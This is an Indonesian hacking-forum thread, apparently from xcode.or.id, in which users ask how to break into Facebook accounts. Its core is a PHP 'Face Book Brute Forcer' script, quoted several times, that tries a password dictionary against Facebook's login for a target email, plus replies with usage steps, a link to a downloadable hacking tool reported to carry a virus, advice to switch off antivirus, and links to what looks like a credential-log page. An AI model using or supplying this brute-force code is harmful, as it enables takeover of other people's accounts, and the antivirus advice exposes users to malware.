<ask> facebook
Moderators: Paman, Xshadow, indounderground
-
- Posts: 37
- Joined: Mon Feb 16, 2009 12:35 pm
<ask> facebook
<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##
para master cara pake nih script nya gemnh y.....
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##
para master cara pake nih script nya gemnh y.....
Re: <ask> facebook
itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
Re: <ask> facebook
bknnya tuh script php om .....shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
pujiyanto18 wrote:<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##
para master cara pake nih script nya gemnh y.....
Re: <ask> facebook
exnome wrote:bknnya tuh script php om .....shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
pujiyanto18 wrote:<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##
para master cara pake nih script nya gemnh y.....
check this out @ forum.yogyafree.net
uda pernah gw bahas,, cari2 aja disana..[malas copy kesini]
*Come to me and feel my strength*
- Digital Cat
- Posts: 437
- Joined: Fri Jun 26, 2009 6:13 pm
- Location: USA
- Contact:
Re: <ask> facebook
Pake aja Tools / Program gua
Digital Face Book v1.0
Di Forum X - Code Dibawah ini,coy...
Hacking Tools -> Digital Cat Tools
http://xcode.or.id/forum2/viewtopic.php?f=100&t=35703
Digital Face Book v1.0
Di Forum X - Code Dibawah ini,coy...
Hacking Tools -> Digital Cat Tools
http://xcode.or.id/forum2/viewtopic.php?f=100&t=35703
Re: <ask> facebook
coba yg ini oms...........
maklum buatan newbie.............
Code: Select all
http://www.yourpic.us/admin/index.html
Code: Select all
http://www.yourpic.us/admin/logs.txt
-
- Posts: 9
- Joined: Sun Apr 05, 2009 7:11 pm
Re: <ask> facebook
kakak Digital Cat kok software'a bervirus.?
tolong upload ulang lg dong kakak tanpa virus..
tolong upload ulang lg dong kakak tanpa virus..
- ithinkimdumb
- Posts: 18
- Joined: Thu Jul 09, 2009 7:03 am
Re: <ask> facebook
bervirus ?
wajar itu file exe .
coba matiin aja dulu anti virus nya .
cmiiw
wajar itu file exe .
coba matiin aja dulu anti virus nya .
cmiiw
Re: <ask> facebook
shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
aq gax mudeng ...tapi aku perlu taw ..tolong bgt kasi tw aku ..
Re: <ask> facebook
dr awal nyalain komputer ..konek internet ..trus apa??ferbe wrote:shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa..
kabooorr..
aq gax mudeng ...tapi aku perlu taw ..tolong bgt kasi tw aku ..